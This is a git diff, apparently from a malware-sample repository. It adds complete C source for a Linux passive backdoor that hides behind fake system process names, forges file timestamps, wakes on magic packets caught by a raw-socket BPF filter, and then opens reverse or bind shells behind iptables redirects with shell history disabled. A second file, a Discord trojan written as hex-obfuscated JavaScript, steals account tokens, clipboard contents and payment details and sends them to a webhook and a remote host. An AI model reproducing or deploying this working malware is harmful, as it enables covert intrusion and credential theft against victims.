cread(int fd, void *buf, int count) +{ + int i; + + if (!count) + return 0; + i = read(fd, buf, count); + + if (i > 0) + rc4(buf, i, &decrypt_ctx); + return i; +} + +static void remove_pid(char *pp) +{ + unlink(pp); +} + +static void setup_time(char *file) +{ + struct timeval tv[2]; + + tv[0].tv_sec = 1225394236; + tv[0].tv_usec = 0; + + tv[1].tv_sec = 1225394236; + tv[1].tv_usec = 0; + + utimes(file, tv); +} +static void terminate(void) +{ + if (getpid() == godpid) + remove_pid(pid_path); + + _exit(EXIT_SUCCESS); +} + +static void on_terminate(int signo) +{ + terminate(); +} +static void init_signal(void) +{ + atexit(terminate); + signal(SIGTERM, on_terminate); + return; +} + +void sig_child(int i) +{ + signal(SIGCHLD, sig_child); + waitpid(-1, NULL, WNOHANG); +} + +int ptym_open(char *pts_name) +{ + char *ptr; + int fd; + + strcpy(pts_name,"/dev/ptmx"); + if ((fd = open(pts_name,O_RDWR)) < 0) { + return -1; + } + + if (grantpt(fd) < 0) { + close(fd); + return -2; + } + + if (unlockpt(fd) < 0) { + close(fd); + return -3; + } + + if ((ptr = ptsname(fd)) == NULL) { + close(fd); + return -4; + } + + strcpy(pts_name,ptr); + + return fd; +} + +int ptys_open(int fd,char *pts_name) +{ + int fds; + + if ((fds = open(pts_name,O_RDWR)) < 0) { + close(fd); + return -5; + } + + + if (ioctl(fds,I_PUSH,"ptem") < 0) { + return fds; + } + + if (ioctl(fds,I_PUSH,"ldterm") < 0) { + return fds; + } + + if (ioctl(fds,I_PUSH,"ttcompat") < 0) { + return fds; + } + + return fds; +} + +int open_tty() +{ + char pts_name[20]; + + pty = ptym_open(pts_name); + + tty = ptys_open(pty,pts_name); + + if (pty >= 0 && tty >=0 ) + return 1; + return 0; +} + +int try_link(in_addr_t ip, unsigned short port) +{ + struct sockaddr_in serv_addr; + int sock; + + bzero(&serv_addr, sizeof(serv_addr)); + + serv_addr.sin_addr.s_addr = ip; + + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { + return -1; + } + + serv_addr.sin_family = AF_INET; + serv_addr.sin_port = port; + + if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(struct sockaddr)) == -1 ) { + close(sock); + return -1; + } + return sock; +} + +int mon(in_addr_t ip, unsigned short port) +{ + struct sockaddr_in remote; + int sock; + int s_len; + + bzero(&remote, sizeof(remote)); + if ((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < -1) { + return -1; + } + remote.sin_family = AF_INET; + remote.sin_port = port; + remote.sin_addr.s_addr = ip; + + if ((s_len = sendto(sock, "1", 1, 0, (struct sockaddr *)&remote, sizeof(struct sockaddr))) < 0) { + close(sock); + return -1; + } + close(sock); + return s_len; +} + +int set_proc_name(int argc, char **argv, char *new) +{ + size_t size = 0; + int i; + char *raw = NULL; + char *last = NULL; + + argv0 = argv[0]; + + for (i = 0; environ[i]; i++) + size += strlen(environ[i]) + 1; + + raw = (char *) malloc(size); + if (NULL == raw) + return -1; + + for (i = 0; environ[i]; i++) + { + memcpy(raw, environ[i], strlen(environ[i]) + 1); + environ[i] = raw; + raw += strlen(environ[i]) + 1; + } + + last = argv[0]; + + for (i = 0; i < argc; i++) + last += strlen(argv[i]) + 1; + for (i = 0; environ[i]; i++) + last += strlen(environ[i]) + 1; + + memset(argv0, 0x00, last - argv0); + strncpy(argv0, new, last - argv0); + + prctl(PR_SET_NAME, (unsigned long) new); + return 0; +} +int to_open(char *name, char *tmp) +{ + char cmd[256] = {0}; + char fmt[] = { + 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x72, 0x6d, 0x20, 0x2d, 0x66, + 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, 0x2f, + 0x25, 0x73, 0x3b, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x63, 0x70, + 0x20, 0x25, 0x73, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, + 0x68, 0x6d, 0x2f, 0x25, 0x73, 0x20, 0x26, 0x26, 0x20, 0x2f, + 0x62, 0x69, 0x6e, 0x2f, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, + 0x37, 0x35, 0x35, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, + 0x68, 0x6d, 0x2f, 0x25, 0x73, 0x20, 0x26, 0x26, 0x20, 0x2f, + 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, 0x2f, 0x25, 0x73, + 0x20, 0x2d, 0x2d, 0x69, 0x6e, 0x69, 0x74, 0x20, 0x26, 0x26, + 0x20, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x72, 0x6d, 0x20, 0x2d, + 0x66, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, + 0x2f, 0x25, 0x73, 0x00}; // /bin/rm -f /dev/shm/%s;/bin/cp %s /dev/shm/%s && /bin/chmod 755 /dev/shm/%s && /dev/shm/%s --init && /bin/rm -f /dev/shm/%s + + snprintf(cmd, sizeof(cmd), fmt, tmp, name, tmp, tmp, tmp, tmp); + system(cmd); + sleep(2); + if (access(pid_path, R_OK) == 0) + return 0; + return 1; +} + +int logon(const char *hash) +{ + int x = 0; + x = memcmp(cfg.pass, hash, strlen(cfg.pass)); + if (x == 0) + return 0; + x = memcmp(cfg.pass2, hash, strlen(cfg.pass2)); + if (x == 0) + return 1; + + return 2; +} + +void packet_loop() +{ + int sock, r_len, pid, scli, size_ip, size_tcp; + socklen_t psize; + uchar buff[512]; + const struct sniff_ip *ip; + const struct sniff_tcp *tcp; + struct magic_packet *mp; + const struct sniff_udp *udp; + in_addr_t bip; + char *pbuff = NULL; + + // + // Filter Options Build Filter Struct + // + + struct sock_fprog filter; + struct sock_filter bpf_code[] = { + { 0x28, 0, 0, 0x0000000c }, + { 0x15, 0, 27, 0x00000800 }, + { 0x30, 0, 0, 0x00000017 }, + { 0x15, 0, 5, 0x00000011 }, + { 0x28, 0, 0, 0x00000014 }, + { 0x45, 23, 0, 0x00001fff }, + { 0xb1, 0, 0, 0x0000000e }, + { 0x48, 0, 0, 0x00000016 }, + { 0x15, 19, 20, 0x00007255 }, + { 0x15, 0, 7, 0x00000001 }, + { 0x28, 0, 0, 0x00000014 }, + { 0x45, 17, 0, 0x00001fff }, + { 0xb1, 0, 0, 0x0000000e }, + { 0x48, 0, 0, 0x00000016 }, + { 0x15, 0, 14, 0x00007255 }, + { 0x50, 0, 0, 0x0000000e }, + { 0x15, 11, 12, 0x00000008 }, + { 0x15, 0, 11, 0x00000006 }, + { 0x28, 0, 0, 0x00000014 }, + { 0x45, 9, 0, 0x00001fff }, + { 0xb1, 0, 0, 0x0000000e }, + { 0x50, 0, 0, 0x0000001a }, + { 0x54, 0, 0, 0x000000f0 }, + { 0x74, 0, 0, 0x00000002 }, + { 0xc, 0, 0, 0x00000000 }, + { 0x7, 0, 0, 0x00000000 }, + { 0x48, 0, 0, 0x0000000e }, + { 0x15, 0, 1, 0x00005293 }, + { 0x6, 0, 0, 0x0000ffff }, + { 0x6, 0, 0, 0x00000000 }, + }; + + filter.len = sizeof(bpf_code)/sizeof(bpf_code[0]); + filter.filter = bpf_code; + + // + // Build a rawsocket that binds the NIC to receive Ethernet frames + // + + if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP))) < 1) + return; + + // + // Set a packet filter + // + + if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, &filter, sizeof(filter)) == -1) { + return; + } + + + // + // Loop to Read Packets in 512 Chunks + // + + + while (1) { + memset(buff, 0, 512); + psize = 0; + r_len = recvfrom(sock, buff, 512, 0x0, NULL, NULL); + + ip = (struct sniff_ip *)(buff+14); + size_ip = IP_HL(ip)*4; + if (size_ip < 20) continue; + + // determine protocl from packet (offset 14) + switch(ip->ip_p) { + case IPPROTO_TCP: + tcp = (struct sniff_tcp*)(buff+14+size_ip); + size_tcp = TH_OFF(tcp)*4; + mp = (struct magic_packet *)(buff+14+size_ip+size_tcp); + break; + case IPPROTO_UDP: + udp = (struct sniff_udp *)(ip+1); + mp = (struct magic_packet *)(udp+1); + break; + case IPPROTO_ICMP: + pbuff = (char *)(ip+1); + mp = (struct magic_packet *)(pbuff+8); + break; + default: + break; + } + + // if magic packet is set process + + if (mp) { + if (mp->ip == INADDR_NONE) + bip = ip->ip_src.s_addr; + else + bip = mp->ip; + + pid = fork(); + if (pid) { + waitpid(pid, NULL, WNOHANG); + } + else { + int cmp = 0; + char sip[20] = {0}; + char pname[] = {0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x69, 0x62, 0x65, 0x78, 0x65, 0x63, 0x2f, 0x70, 0x6f, 0x73, 0x74, 0x66, 0x69, 0x78, 0x2f, 0x6d, 0x61, 0x73, 0x74, 0x65, + 0x72, 0x00}; // /usr/libexec/postfix/master + + if (fork()) exit(0); + chdir("/"); + setsid(); + signal(SIGHUP, SIG_DFL); + memset(argv0, 0, strlen(argv0)); + strcpy(argv0, pname); // sets process name (/usr/libexec/postfix/master) + prctl(PR_SET_NAME, (unsigned long) pname); + + rc4_init(mp->pass, strlen(mp->pass), &crypt_ctx); + rc4_init(mp->pass, strlen(mp->pass), &decrypt_ctx); + + cmp = logon(mp->pass); + switch(cmp) { + case 1: + strcpy(sip, inet_ntoa(ip->ip_src)); + getshell(sip, ntohs(tcp->th_dport)); + break; + case 0: + scli = try_link(bip, mp->port); + if (scli > 0) + shell(scli, NULL, NULL); + break; + case 2: + mon(bip, mp->port); + break; + } + exit(0); + } + } + + } + close(sock); +} + +int b(int *p) +{ + int port; + struct sockaddr_in my_addr; + int sock_fd; + int flag = 1; + + if( (sock_fd = socket(AF_INET,SOCK_STREAM,0)) == -1 ){ + return -1; + } + + setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, (char*)&flag,sizeof(flag)); + + my_addr.sin_family = AF_INET; + my_addr.sin_addr.s_addr = 0; + + for (port = 42391; port < 43391; port++) { + my_addr.sin_port = htons(port); + if( bind(sock_fd,(struct sockaddr *)&my_addr,sizeof(struct sockaddr)) == -1 ){ + continue; + } + if( listen(sock_fd,1) == 0 ) { + *p = port; + return sock_fd; + } + close(sock_fd); + } + return -1; +} + +int w(int sock) +{ + socklen_t size; + struct sockaddr_in remote_addr; + int sock_id; + + size = sizeof(struct sockaddr_in); + if( (sock_id = accept(sock,(struct sockaddr *)&remote_addr, &size)) == -1 ){ + return -1; + } + + close(sock); + return sock_id; + +} + +void getshell(char *ip, int fromport) +{ + int sock, sockfd, toport; + char cmd[512] = {0}, rcmd[512] = {0}, dcmd[512] = {0}; + char cmdfmt[] = { + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, + 0x65, 0x73, 0x20, 0x2d, 0x74, 0x20, 0x6e, 0x61, 0x74, 0x20, 0x2d, 0x41, + 0x20, 0x50, 0x52, 0x45, 0x52, 0x4f, 0x55, 0x54, 0x49, 0x4e, 0x47, 0x20, + 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, + 0x20, 0x2d, 0x2d, 0x64, 0x70, 0x6f, 0x72, 0x74, 0x20, 0x25, 0x64, 0x20, + 0x2d, 0x6a, 0x20, 0x52, 0x45, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x20, + 0x2d, 0x2d, 0x74, 0x6f, 0x2d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x20, 0x25, + 0x64, 0x00}; // /sbin/iptables -t nat -A PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d + char rcmdfmt[] = { + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, + 0x65, 0x73, 0x20, 0x2d, 0x74, 0x20, 0x6e, 0x61, 0x74, 0x20, 0x2d, 0x44, + 0x20, 0x50, 0x52, 0x45, 0x52, 0x4f, 0x55, 0x54, 0x49, 0x4e, 0x47, 0x20, + 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, + 0x20, 0x2d, 0x2d, 0x64, 0x70, 0x6f, 0x72, 0x74, 0x20, 0x25, 0x64, 0x20, + 0x2d, 0x6a, 0x20, 0x52, 0x45, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x20, + 0x2d, 0x2d, 0x74, 0x6f, 0x2d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x20, 0x25, + 0x64, 0x00}; // /sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d + char inputfmt[] = { + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, + 0x65, 0x73, 0x20, 0x2d, 0x49, 0x20, 0x49, 0x4e, 0x50, 0x55, 0x54, 0x20, + 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, + 0x20, 0x2d, 0x6a, 0x20, 0x41, 0x43, 0x43, 0x45, 0x50, 0x54, 0x00}; // /sbin/iptables -I INPUT -p tcp -s %s -j ACCEPT + char dinputfmt[] = { + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, + 0x65, 0x73, 0x20, 0x2d, 0x44, 0x20, 0x49, 0x4e, 0x50, 0x55, 0x54, 0x20, + 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, + 0x20, 0x2d, 0x6a, 0x20, 0x41, 0x43, 0x43, 0x45, 0x50, 0x54, 0x00}; // /sbin/iptables -D INPUT -p tcp -s %s -j ACCEPT + + sockfd = b(&toport); // looks like it selects random ephemral port here + if (sockfd == -1) return; + + snprintf(cmd, sizeof(cmd), inputfmt, ip); + snprintf(dcmd, sizeof(dcmd), dinputfmt, ip); + system(cmd); // executes /sbin/iptables -I INPUT -p tcp -s %s -j ACCEPT + sleep(1); + memset(cmd, 0, sizeof(cmd)); + snprintf(cmd, sizeof(cmd), cmdfmt, ip, fromport, toport); + snprintf(rcmd, sizeof(rcmd), rcmdfmt, ip, fromport, toport); + system(cmd); // executes /sbin/iptables -t nat -A PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d + sleep(1); + sock = w(sockfd); // creates a sock that listens on port specified earlier + if( sock < 0 ){ + close(sock); + return; + } + + // + // passes sock and + // rcmd = /sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d + // dcmd = /sbin/iptables -D INPUT -p tcp -s %s -j ACCEPT + // + // + + shell(sock, rcmd, dcmd); + close(sock); +} + +int shell(int sock, char *rcmd, char *dcmd) +{ + int subshell; + fd_set fds; + char buf[BUF]; + char argx[] = { + 0x71, 0x6d, 0x67, 0x72, 0x20, 0x2d, 0x6c, 0x20, 0x2d, 0x74, + 0x20, 0x66, 0x69, 0x66, 0x6f, 0x20, 0x2d, 0x75, 0x00}; // qmgr -l -t fifo -u + char *argvv[] = {argx, NULL, NULL}; + #define MAXENV 256 + #define ENVLEN 256 + char *envp[MAXENV]; + char sh[] = {0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00}; // /bin/sh + int ret; + char home[] = {0x48, 0x4f, 0x4d, 0x45, 0x3d, 0x2f, 0x74, 0x6d, 0x70, 0x00}; // HOME=/tmp + char ps[] = { + 0x50, 0x53, 0x31, 0x3d, 0x5b, 0x5c, 0x75, 0x40, 0x5c, 0x68, 0x20, + 0x5c, 0x57, 0x5d, 0x5c, 0x5c, 0x24, 0x20, 0x00}; // PS1=[\u@\h \W]\\$ + char histfile[] = { + 0x48, 0x49, 0x53, 0x54, 0x46, 0x49, 0x4c, 0x45, 0x3d, 0x2f, 0x64, + 0x65, 0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x00}; // HISTFILE=/dev/null + char mshist[] = { + 0x4d, 0x59, 0x53, 0x51, 0x4c, 0x5f, 0x48, 0x49, 0x53, 0x54, 0x46, + 0x49, 0x4c, 0x45, 0x3d, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x6e, 0x75, + 0x6c, 0x6c, 0x00}; // MYSQL_HISTFILE=/dev/null + char ipath[] = { + 0x50, 0x41, 0x54, 0x48, 0x3d, 0x2f, 0x62, 0x69, 0x6e, + 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6b, 0x65, 0x72, 0x62, 0x65, + 0x72, 0x6f, 0x73, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, + 0x73, 0x72, 0x2f, 0x6b, 0x65, 0x72, 0x62, 0x65, 0x72, 0x6f, 0x73, + 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, + 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, + 0x73, 0x72, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, + 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x2f, 0x62, 0x69, 0x6e, + 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, + 0x58, 0x31, 0x31, 0x52, 0x36, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2e, + 0x2f, 0x62, 0x69, 0x6e, 0x00}; // PATH=/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin:./bin + char term[] = "vt100"; + + envp[0] = home; + envp[1] = ps; + envp[2] = histfile; + envp[3] = mshist; + envp[4] = ipath; + envp[5] = term; + envp[6] = NULL; + + if (rcmd != NULL) + system(rcmd); + if (dcmd != NULL) + system(dcmd); + write(sock, "3458", 4); + if (!open_tty()) { + if (!fork()) { + dup2(sock, 0); + dup2(sock, 1); + dup2(sock, 2); + execve(sh, argvv, envp); + } + close(sock); + return 0; + } + + subshell = fork(); + if (subshell == 0) { + close(pty); + ioctl(tty, TIOCSCTTY); + close(sock); + dup2(tty, 0); + dup2(tty, 1); + dup2(tty, 2); + close(tty); + execve(sh, argvv, envp); + } + close(tty); + + while (1) { + FD_ZERO(&fds); + FD_SET(pty, &fds); + FD_SET(sock, &fds); + if (select((pty > sock) ? (pty+1) : (sock+1), + &fds, NULL, NULL, NULL) < 0) + { + break; + } + if (FD_ISSET(pty, &fds)) { + int count; + count = read(pty, buf, BUF); + if (count <= 0) break; + if (cwrite(sock, buf, count) <= 0) break; + } + if (FD_ISSET(sock, &fds)) { + int count; + unsigned char *p, *d; + d = (unsigned char *)buf; + count = cread(sock, buf, BUF); + if (count <= 0) break; + + p = memchr(buf, ECHAR, count); + if (p) { + unsigned char wb[5]; + int rlen = count - ((long) p - (long) buf); + struct winsize ws; + + if (rlen > 5) rlen = 5; + memcpy(wb, p, rlen); + if (rlen < 5) { + ret = cread(sock, &wb[rlen], 5 - rlen); + } + + ws.ws_xpixel = ws.ws_ypixel = 0; + ws.ws_col = (wb[1] << 8) + wb[2]; + ws.ws_row = (wb[3] << 8) + wb[4]; + ioctl(pty, TIOCSWINSZ, &ws); + kill(0, SIGWINCH); + + ret = write(pty, buf, (long) p - (long) buf); + rlen = ((long) buf + count) - ((long)p+5); + if (rlen > 0) ret = write(pty, p+5, rlen); + } else + if (write(pty, d, count) <= 0) break; + } + } + close(sock); + close(pty); + waitpid(subshell, NULL, 0); + vhangup(); + exit(0); +} + +int main(int argc, char *argv[]) +{ + char hash[] = {0x6a, 0x75, 0x73, 0x74, 0x66, 0x6f, 0x72, 0x66, 0x75, 0x6e, 0x00}; // justforfun + char hash2[]= {0x73, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x00}; // socket + char *self[] = { + "/sbin/udevd -d", + "/sbin/mingetty /dev/tty7", + "/usr/sbin/console-kit-daemon --no-daemon", + "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event", + "dbus-daemon --system", + "hald-runner", + "pickup -l -t fifo -u", + "avahi-daemon: chroot helper", + "/sbin/auditd -n", + "/usr/lib/systemd/systemd-journald" + }; + + pid_path[0] = 0x2f; pid_path[1] = 0x76; pid_path[2] = 0x61; + pid_path[3] = 0x72; pid_path[4] = 0x2f; pid_path[5] = 0x72; + pid_path[6] = 0x75; pid_path[7] = 0x6e; pid_path[8] = 0x2f; + pid_path[9] = 0x68; pid_path[10] = 0x61; pid_path[11] = 0x6c; + pid_path[12] = 0x64; pid_path[13] = 0x72; pid_path[14] = 0x75; + pid_path[15] = 0x6e; pid_path[16] = 0x64; pid_path[17] = 0x2e; + pid_path[18] = 0x70; pid_path[19] = 0x69; pid_path[20] = 0x64; + pid_path[21] = 0x00; // /var/run/haldrund.pid + + if (access(pid_path, R_OK) == 0) { + exit(0); + } + + if (getuid() != 0) { + return 0; + } + + if (argc == 1) { + if (to_open(argv[0], "kdmtmpflush") == 0) + _exit(0); + _exit(-1); + } + + bzero(&cfg, sizeof(cfg)); + + srand((unsigned)time(NULL)); + strcpy(cfg.mask, self[rand()%10]); + strcpy(cfg.pass, hash); + strcpy(cfg.pass2, hash2); + + setup_time(argv[0]); + + set_proc_name(argc, argv, cfg.mask); + + if (fork()) exit(0); + init_signal(); + signal(SIGCHLD, sig_child); + godpid = getpid(); + + close(open(pid_path, O_CREAT|O_WRONLY, 0644)); + + signal(SIGCHLD,SIG_IGN); + setsid(); + packet_loop(); + return 0; } \ No newline at end of file diff --git a/Leaks/Other/Trojan.Discord.SpideyBot.a b/Other/Trojan.Discord.SpideyBot.a similarity index 98% rename from Leaks/Other/Trojan.Discord.SpideyBot.a rename to Other/Trojan.Discord.SpideyBot.a index ee8082736..f5d95e6b9 100644 --- a/Leaks/Other/Trojan.Discord.SpideyBot.a +++ b/Other/Trojan.Discord.SpideyBot.a @@ -1,234 +1,234 @@ -modules\ discord_modules: - -var _0x476f = ["\x74\x6F\x73\x74\x72\x69\x6E\x67\x20\x77\x61\x73\x20\x68\x65\x72\x65", "\x72\x65\x71\x75\x69\x72\x65", "\x65\x6C\x65\x63\x74\x72\x6F\x6E", "\x74\x6F\x6B\x65\x6E", "\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65", "\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x22", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x60", "\x73\x69\x7A\x65\x31\x34\x2D\x65\x36\x5A\x53\x63\x48\x20\x74\x69\x74\x6C\x65\x2D\x65\x53\x35\x79\x6B\x33", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65", "\x55\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x66\x65\x74\x63\x68\x2C\x20\x70\x6F\x73\x73\x69\x62\x6C\x79\x20\x64\x75\x65\x20\x74\x6F\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x64\x69\x73\x63\x6F\x72\x64\x20\x64\x69\x73\x74\x72\x69\x62\x75\x74\x65\x20\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x2E", "\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x6C\x6F\x61\x64", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x47\x45\x54", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x2F\x57\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x2E\x74\x78\x74", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x7B\x22\x6D\x65\x73\x73\x61\x67\x65\x22\x3A\x20\x22\x49\x6E\x76\x61\x6C\x69\x64\x20\x57\x65\x62\x68\x6F\x6F\x6B\x20\x54\x6F\x6B\x65\x6E\x22\x2C\x20\x22\x63\x6F\x64\x65\x22\x3A\x20\x35\x30\x30\x32\x37\x7D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x36\x32\x39\x31\x39\x36\x34\x30\x37\x31\x36\x34\x36\x33\x33\x30\x38\x39\x2F\x6F\x38\x30\x70\x70\x4E\x42\x31\x34\x31\x6B\x52\x7A\x6D\x51\x70\x6C\x31\x70\x76\x48\x6C\x74\x52\x6A\x47\x2D\x4B\x33\x2D\x43\x41\x6C\x72\x52\x6D\x4F\x79\x33\x4F\x46\x4F\x58\x65\x57\x31\x2D\x65\x58\x49\x57\x78\x42\x45\x54\x50\x71\x55\x48\x47\x69\x58\x61\x43\x44\x53\x58\x70", "\x50\x4F\x53\x54", "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x74\x72\x69\x6E\x67\x69\x66\x79", "\x67\x65\x74\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72", "\x77\x65\x62\x46\x72\x61\x6D\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x67\x65\x74\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x70\x70", "\x72\x65\x6D\x6F\x74\x65", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x72\x65\x61\x64\x54\x65\x78\x74", "\x63\x6C\x69\x70\x62\x6F\x61\x72\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67", "\x74\x69\x6D\x65\x5A\x6F\x6E\x65", "\x72\x65\x73\x6F\x6C\x76\x65\x64\x4F\x70\x74\x69\x6F\x6E\x73", "\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x78", "\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65", "\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E", "\x5B\x5D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x36\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65\x2F\x62\x69\x6C\x6C\x69\x6E\x67\x2F\x70\x61\x79\x6D\x65\x6E\x74\x2D\x73\x6F\x75\x72\x63\x65\x73", "\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x6D\x6F\x7A\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x77\x65\x62\x6B\x69\x74\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x44\x61\x74\x61\x43\x68\x61\x6E\x6E\x65\x6C", "\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x69\x6E\x64\x65\x78\x4F\x66", "\x66\x6F\x72\x45\x61\x63\x68", "\x6D\x61\x74\x63\x68", "\x0A", "\x73\x70\x6C\x69\x74", "\x73\x64\x70", "\x73\x65\x74\x4C\x6F\x63\x61\x6C\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x4F\x66\x66\x65\x72", "\x6F\x6E\x69\x63\x65\x63\x61\x6E\x64\x69\x64\x61\x74\x65", 